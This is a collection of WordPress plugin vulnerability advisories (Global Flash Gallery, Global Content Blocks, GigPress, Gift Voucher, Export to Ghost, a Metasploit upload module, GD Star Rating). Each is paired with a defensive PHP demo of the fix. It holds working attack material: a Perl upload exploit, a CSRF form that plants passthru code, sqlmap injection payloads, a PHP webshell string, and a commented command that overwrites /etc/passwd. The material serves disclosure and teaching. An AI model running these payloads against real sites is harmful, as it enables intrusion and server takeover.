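        wp_send_json_error( 'forbidden', 403 );
    }

    // delete() with a '%d' format is the one call the original already did safely.
    $wpdb->delete( $table, array( 'id' => $id ), array( '%d' ) );
    wp_send_json_success();
}
```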
            
source: https://www.securityfocus.com/bid/65060/info

The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

#!/usr/bin/perl
use strict;
use warnings;
use LWP;
use HTTP::Request::Common;

my ($url, $file) = @ARGV;
die "usage: $0 <swfupload.php URL> <local file>\n" unless defined $file;
my $name = 'file.php.gif';   # value for the 'name' form field; left undefined in the original script

my $ua  = LWP::UserAgent->new();
my $req = POST $url,
    Content_Type => 'form-data',
    Content      => [
        name          => $name,
        galleryselect => 1,    # Gallery ID (popup.php)
        Filedata      => [ $file, 'file.php.gif', Content_Type => 'image/gif' ],
    ];
my $res = $ua->request($req);
if ( $res->is_success ) {
    print $res->content;
} else {
    print $res->status_line, "\n";
}

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
            
<!--
Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html

Abstract
It was discovered that the Global Content Blocks WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.

Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160712-0031

Tested versions
This issue was successfully tested on Global Content Blocks WordPress Plugin version 2.1.5.

Fix
There is currently no fix available.

Introduction
The Global Content Blocks WordPress Plugin lets users create their own shortcodes to insert reusable code snippets, PHP or HTML including forms, opt-in boxes, iframes, Adsense code, etc, into pages and posts as well as widgets and directly into php content. Global Content Blocks is affected by Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.

Details
The issue exists due to the fact that Global Content Blocks does not use the Cross-Site Request Forgery protection provided by WordPress. Actions with Global Content Blocks have a predictable format, thus an attacker can forge a request that can be executed by a logged in Administrator. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept
The following proof of concept will update/overwrite the content block with id 1. In order to run the attacker's PHP code, a page/blog needs to be viewed that contains this content block (eg, [contentblock id=1]).
-->

<html>
   <body>
      <form action="http://<target>/wp-admin/options-general.php?page=global-content-blocks" method="POST">
         <input type="hidden" name="gcb_view" value="update" />
         <input type="hidden" name="update_it" value="1" />
         <input type="hidden" name="gcb_name" value="Foo" />
         <input type="hidden" name="gcb_custom_id" value="" />
         <input type="hidden" name="gcb_type" value="php" />
         <input type="hidden" name="gcb_description" value="" />
         <input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
         <input type="hidden" name="gcb_updateshortcode" value="Update" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
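What the handler is missing, shown as an added example rather than code from Global Content Blocks: a PHP script that applies the update twice, once the way the plugin does (any POST carrying the parameters from the form above is accepted because the victim's browser attaches the administrator's cookies) and once behind a capability check and a nonce bound to the action and the user. The nonce helpers are a standalone stand-in for wp_create_nonce()/wp_verify_nonce() so the script runs under the php CLI without WordPress; in a plugin use wp_nonce_field() in the form, check_admin_referer() or wp_verify_nonce() in the handler, and current_user_can('manage_options'). The function names, the block store and the secret are assumptions.

```php
<?php
// Added example (not Global Content Blocks code): why the forged form works and what
// the update handler has to check. Standalone: `php csrf_demo.php`.

// --- Stand-ins for the WordPress nonce helpers (assumption: a plugin uses the WP ones) ---
// A nonce is a short HMAC over action + user + time window; a third-party site cannot read it.
const NONCE_SECRET = 'constructed-secret-for-the-demo';   // WP derives this from AUTH_KEY/AUTH_SALT
const NONCE_TICK   = 43200;                               // WP nonces live for roughly 12-24 hours

function demo_create_nonce(string $action, int $user_id, ?int $now = null): string {
    $tick = (int) ceil(($now ?? time()) / NONCE_TICK);
    return substr(hash_hmac('sha256', "$tick|$action|$user_id", NONCE_SECRET), -10);
}

function demo_verify_nonce(string $nonce, string $action, int $user_id, ?int $now = null): bool {
    $tick = (int) ceil(($now ?? time()) / NONCE_TICK);
    foreach ([$tick, $tick - 1] as $t) {            // current and previous window, like WP
        $expected = substr(hash_hmac('sha256', "$t|$action|$user_id", NONCE_SECRET), -10);
        if (hash_equals($expected, $nonce)) {
            return true;
        }
    }
    return false;
}

// --- Vulnerable shape: trusts the request because the browser sent admin cookies ---
function gcb_update_vulnerable(array $post, array $blocks): array {
    if (($post['gcb_view'] ?? '') === 'update' && !empty($post['update_it'])) {
        $id = (int) $post['update_it'];
        $blocks[$id] = ['name'  => $post['gcb_name'] ?? '',
                        'type'  => $post['gcb_type'] ?? 'html',
                        'value' => $post['gcbvalue'] ?? ''];
    }
    return $blocks;
}

// --- Hardened shape: capability check + nonce. $user is ['id' => .., 'caps' => [..]] ---
function gcb_update_hardened(array $post, array $blocks, array $user): array {
    // 1. Authorisation: only administrators edit blocks (current_user_can('manage_options')).
    if (!in_array('manage_options', $user['caps'], true)) {
        throw new RuntimeException('insufficient capability');
    }
    // 2. CSRF: the nonce must come from a form WordPress rendered for this user and action.
    if (!demo_verify_nonce((string) ($post['_wpnonce'] ?? ''), 'gcb_update', $user['id'])) {
        throw new RuntimeException('nonce check failed');   // check_admin_referer() dies here
    }
    return gcb_update_vulnerable($post, $blocks);           // same state change, now gated
}

// --- Walk-through with the parameters from the PoC form above ---
$forged = ['gcb_view' => 'update', 'update_it' => '1', 'gcb_name' => 'Foo',
           'gcb_type' => 'php', 'gcbvalue' => "passthru('ls -la');"];
$admin  = ['id' => 1, 'caps' => ['manage_options']];
$blocks = [1 => ['name' => 'Sidebar', 'type' => 'html', 'value' => '<p>hi</p>']];

$after = gcb_update_vulnerable($forged, $blocks);
printf("vulnerable: block 1 now holds %s\n", $after[1]['value']);

try {
    gcb_update_hardened($forged, $blocks, $admin);
} catch (RuntimeException $e) {
    printf("hardened, forged request: rejected (%s)\n", $e->getMessage());
}

$legit = $forged + ['_wpnonce' => demo_create_nonce('gcb_update', $admin['id'])];
$after = gcb_update_hardened($legit, $blocks, $admin);
printf("hardened, genuine form: block 1 updated to %s\n", $after[1]['value']);
```

The forged form fails the nonce check because the attacker's site cannot read a nonce out of the victim's admin pages; that, not the session cookie, is what ties the request to a form WordPress itself rendered. The hardened handler still stores PHP when gcb_type is php: evaluating stored PHP is this plugin's feature, which is why one forged request turns into code execution.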
            
# Title: SQLi vulnerabilities in WordPress plugin "GigPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/gigpress/
# Active installs: 20,000+
# Vulnerable version: 2.3.8
# Fixed version: 2.3.9
# CVE: CVE-2015-4066

 Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89]
-------------------------------

* CODE:
admin/handlers.php:87
+++++++++++++++++++++++++++++++++++++++++
$show['show_tour_id'] = $_POST['show_tour_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:94
+++++++++++++++++++++++++++++++++++++++++
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");
+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql
[............]
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_artist_id (POST)
   Type: error-based
   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new
---
[12:21:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated SQLi [CWE-89]
-------------------------------

* CODE:
admin/handlers.php:71
+++++++++++++++++++++++++++++++++++++++++
$show['show_venue_id'] = $_POST['show_venue_id'];
+++++++++++++++++++++++++++++++++++++++++
admin/handlers.php:95
+++++++++++++++++++++++++++++++++++++++++
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);
+++++++++++++++++++++++++++++++++++++++++


* POC:
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php
POST DATA:
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql
[............]
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:
---
Parameter: show_venue_id (POST)
   Type: error-based
   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new

   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
   Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new
---
[12:23:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
+++++++++++++++++++++++++++++++++++++++++


Timeline
========
2015-05-09: Discovered vulnerability.
2015-05-20: Vendor notification.
2015-05-20: Vendor response and fix.
2015-05-25: Public disclosure.
            
# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
# Date: 2018-08-23
# Exploit Author: Renos Nikolaou
# Software Link: https://wordpress.org/plugins/gift-voucher/
# Vendor Homepage: http://www.codemenschen.at/
# Version: 1.0.5
# Tested on: Windows 10
# CVE: N/A
# Description : The vulnerability allows an attacker to inject SQL commands
# via the 'template_id' parameter of the wpgv_doajax_front_template admin-ajax action.
# The PoC request below carries no WordPress login cookie.

# PoC - Blind SQLi :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://domain.com/gift-voucher/
Content-Length: 62
Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
Connection: close

action=wpgv_doajax_front_template&template_id=1 and sleep(15)#

Parameter: template_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
    Vector: AND [INFERENCE]
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
banner:    '5.5.59'
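The pattern behind both the GigPress queries quoted above (admin/handlers.php lines 94 and 95, show_artist_id and show_venue_id) and this template_id injection is an integer taken from the request and concatenated into the statement text. As an added example, not code from either plugin, the script below runs the vulnerable concatenation and the parameterised query side by side against an in-memory SQLite database through PDO, so it runs under the php CLI without WordPress or MySQL; the table, rows and function names are constructed for the demo. In a WordPress plugin the equivalent fix is $wpdb->prepare() with a %d placeholder (or absint() on the value before use).

```php
<?php
// Added example (not GigPress or Gift Voucher code): the unsafe concatenation both advisories
// describe, beside the parameterised query that closes it. Standalone: `php sqli_demo.php`.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed stand-in for the plugin's venues table (GIGPRESS_VENUES in the advisory).
$pdo->exec('CREATE TABLE venues (venue_id INTEGER PRIMARY KEY, venue_name TEXT, venue_city TEXT)');
$pdo->exec("INSERT INTO venues VALUES (1, 'Paradiso', 'Amsterdam'), (2, 'Melkweg', 'Amsterdam'), (3, 'Roxy', 'Hollywood')");

// Vulnerable: mirrors  $wpdb->get_results("... WHERE venue_id = " . $show['show_venue_id'])
// The request value becomes part of the statement text, so SQL inside it runs as SQL.
function venue_lookup_vulnerable(PDO $pdo, string $venue_id): array {
    $sql = 'SELECT venue_name, venue_city FROM venues WHERE venue_id = ' . $venue_id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value travels as a bound parameter and the statement shape is fixed before
// the data is seen. With $wpdb this is  $wpdb->prepare("... WHERE venue_id = %d", $venue_id).
function venue_lookup_safe(PDO $pdo, string $venue_id): array {
    $stmt = $pdo->prepare('SELECT venue_name, venue_city FROM venues WHERE venue_id = :id');
    $stmt->bindValue(':id', (int) $venue_id, PDO::PARAM_INT);   // (int) cast, absint()-style
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Inputs: a normal id, the boolean-blind probe sqlmap reported for template_id, its false
// twin, and a dump-everything payload.
$inputs = [
    'benign'      => '1',
    'blind true'  => '1 AND 4448=4448',
    'blind false' => '1 AND 4448=4449',
    'dump all'    => '1 OR 1=1',
];

foreach ($inputs as $label => $value) {
    $vuln = venue_lookup_vulnerable($pdo, $value);
    $safe = venue_lookup_safe($pdo, $value);
    printf("%-12s vulnerable=%d row(s)  safe=%d row(s)\n", $label, count($vuln), count($safe));
}
// The row-count difference between 'blind true' and 'blind false' is the oracle that
// boolean-based blind injection is built on; the hardened query returns the same single row
// for every input because (int)'1 AND ...' is 1. Time-based probes with SLEEP() are
// MySQL-specific and are not reproduced against SQLite here.
```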
            
# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
 
1. Description
   
Any visitor can download the Ghost export file because the export handler does not check that the requester is an authenticated administrator. Assume all versions < 0.5.6 are vulnerable.
   
2. Proof of Concept

http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file

File will be downloaded.
   
3. Solution:

Update to version 0.5.6

https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
            
source: https://www.securityfocus.com/bid/54440/info

The Generic Plugin for WordPress is prone to an arbitrary-file-upload vulnerability.

An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Generic Plugin 0.1 is vulnerable; other versions are also affected. 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Generic plugins Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary PHP file upload and code execution flaw in some
        WordPress plugins. It POSTs a PHP payload as a multipart/form-data part named
        "Filedata" to the vulnerable upload script, then requests the stored file so the
        web server executes it.
      },
      'Author'         => [ 'KedAns-Dz <ked-h[at]1337day.com>' ], # MSF Module
      'License'        => MSF_LICENSE,
      # Beta version, just for pentest/help - wait for the best!
      'References'     =>
        [
          [ 'URL', 'http://1337day.com/related/18686' ],
          [ 'URL', 'http://packetstormsecurity.org/search/?q=wordpress+shell+upload' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Compat' => { 'ConnectionType' => 'find' }
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jun 16 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
        OptString.new('PLUGIN', [true, 'Path, relative to TARGETURI, of the vulnerable upload script', '/']),
        OptString.new('UDP', [true, 'Path, relative to TARGETURI, where uploaded files are stored', '/'])
        # Example (script and upload directory differ per plugin):
        #   set RHOST 127.0.0.1
        #   set TARGETURI /wp
        #   set PLUGIN wp-content/plugins/foxypress/uploadify/uploadify.php
        #   set UDP wp-content/affiliate_images/
        #   set PAYLOAD php/exec
        #   set CMD echo "toor::0:0:::/bin/bash">/etc/passwd
        #   exploit
      ], self.class)
  end

  # Only confirms that the upload script is reachable, not that it accepts arbitrary files.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(datastore['TARGETURI'], datastore['PLUGIN'])
    })

    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    uri  = datastore['TARGETURI']
    plug = datastore['PLUGIN']
    path = datastore['UDP']

    peer = "#{rhost}:#{rport}"

    # Multipart body: the payload goes in the "Filedata" part under a random .php filename.
    post_data = Rex::MIME::Message.new
    post_data.add_part("<?php #{payload.encoded} ?>",
      'application/octet-stream', nil,
      "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")

    print_status("#{peer} - Sending PHP payload")

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, plug),
      'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
      'data'   => post_data.to_s
    })

    # The upload script answers with JSON carrying the name it stored the file under.
    if res.nil? || res.code != 200 || res.body !~ /\{"raw_file_name":"(\w+)",/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end
    file_name = "#{$1}.php"

    print_good("#{peer} - Our payload is at: #{file_name}! Calling payload...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, path, file_name)
    })

    if res && res.code != 200
      print_error("#{peer} - Server returned #{res.code}")
    end
  end

end
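The upload script the module drives stores whatever filename and bytes arrive in the Filedata part under a web-served directory. As an added example, not the module's or any plugin's code, the validator below shows the checks such a script needs: allow-list the final extension, sniff the content with finfo instead of trusting the client's filename or Content-Type, and store under a server-generated name so double extensions such as shell.php.png never reach disk. It runs under the php CLI on constructed sample files; the function name, the allow-list and the paths are assumptions.

```php
<?php
// Added example (not the module's or any plugin's code): the validation an upload handler
// needs before writing client-supplied bytes to disk. Standalone: `php upload_check.php`.

const ALLOWED = [                       // final extension => MIME type the bytes must match
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

// Returns the server-chosen name the file may be stored under, or null to reject it.
function validate_upload(string $tmp_path, string $client_name): ?string {
    // 1. Never trust the client filename: take only the final extension, lower-cased.
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return null;                                    // .php, .phtml, .phar, no extension, ...
    }
    // 2. Sniff the bytes; the declared extension and Content-Type both come from the attacker.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp_path);
    if ($mime !== ALLOWED[$ext]) {
        return null;                                    // PHP source named .png, etc.
    }
    // 3. Store under a generated name: no double extensions (x.php.png), no path components.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Constructed sample uploads: a 1x1 RGBA PNG header and the kind of part the module sends.
$tmp = sys_get_temp_dir();
$png = "\x89PNG\r\n\x1a\n"
     . "\x00\x00\x00\x0dIHDR"
     . "\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00"
     . "\x1f\x15\xc4\x89";
$cases = [
    ['name' => 'shell.php',     'bytes' => "<?php system(\$_GET['c']); ?>"],   // what the module uploads
    ['name' => 'shell.php.png', 'bytes' => "<?php system(\$_GET['c']); ?>"],   // double extension
    ['name' => 'shell.png',     'bytes' => "<?php system(\$_GET['c']); ?>"],   // right name, wrong bytes
    ['name' => 'avatar.png',    'bytes' => $png],                               // legitimate image
];

foreach ($cases as $i => $c) {
    $path = "$tmp/upload_demo_$i";
    file_put_contents($path, $c['bytes']);
    $stored = validate_upload($path, $c['name']);
    printf("%-15s -> %s\n", $c['name'], $stored ?? 'REJECTED');
    unlink($path);
}
```

Validation alone is not the whole fix: the upload directory should not execute scripts at all, for example an .htaccess with `php_flag engine off` (or `RemoveHandler .php`) under Apache/mod_php, or a static-only location block in nginx, so that a validator mistake yields a download rather than a shell.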
            
source: https://www.securityfocus.com/bid/53527/info

The GD Star Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

GD Star Rating 1.9.16 is vulnerable; other versions may also be affected.

http://www.example.com/wp-admin/admin.php?page=gd-star-rating-t2&tpl_section=<script>alert(1)</script>&gdsr_create=Create
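As an added example (not GD Star Rating code), the script below reflects the tpl_section value from the PoC URL into two sinks, page text and an attribute value (the advisory does not show which the plugin uses; both sinks are constructed here), first raw and then through htmlspecialchars() with ENT_QUOTES, the non-WordPress equivalent of esc_html()/esc_attr().

```php
<?php
// Added example (not GD Star Rating code): reflecting tpl_section unescaped vs escaped.
// Standalone: `php xss_demo.php`. Both sinks are constructed; the advisory shows only the parameter.

// Text sink: the value is written between tags. Unescaped, the PoC payload becomes a <script> element.
function reflect_text_vulnerable(string $tpl_section): string {
    return '<p>Template section: ' . $tpl_section . '</p>';
}

// Attribute sink: the value is written back into the form field it came from.
function reflect_attr_vulnerable(string $tpl_section): string {
    return '<input type="text" name="tpl_section" value="' . $tpl_section . '">';
}

// One encoder for both contexts: &, <, >, " and ' are all replaced, so the value can neither
// close the attribute nor open a tag. Equivalent of esc_html()/esc_attr() in WordPress.
function esc(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function reflect_text_safe(string $tpl_section): string {
    return '<p>Template section: ' . esc($tpl_section) . '</p>';
}

function reflect_attr_safe(string $tpl_section): string {
    return '<input type="text" name="tpl_section" value="' . esc($tpl_section) . '">';
}

$payloads = [
    'advisory PoC (text sink)'              => ['<script>alert(1)</script>', 'text'],
    'constructed breakout (attribute sink)' => ['"><script>alert(1)</script>', 'attr'],
];

foreach ($payloads as $label => [$p, $ctx]) {
    echo "$label\n";
    if ($ctx === 'text') {
        echo '  vulnerable: ' . reflect_text_vulnerable($p) . "\n";
        echo '  safe:       ' . reflect_text_safe($p) . "\n";
    } else {
        echo '  vulnerable: ' . reflect_attr_vulnerable($p) . "\n";
        echo '  safe:       ' . reflect_attr_safe($p) . "\n";
    }
}
// Caveat: htmlspecialchars() without ENT_QUOTES leaves ' untouched, which is fine for text
// but not for a single-quoted attribute; escape at output with the flags for the context
// you are writing into rather than relying on one generic "sanitize" pass on input.
```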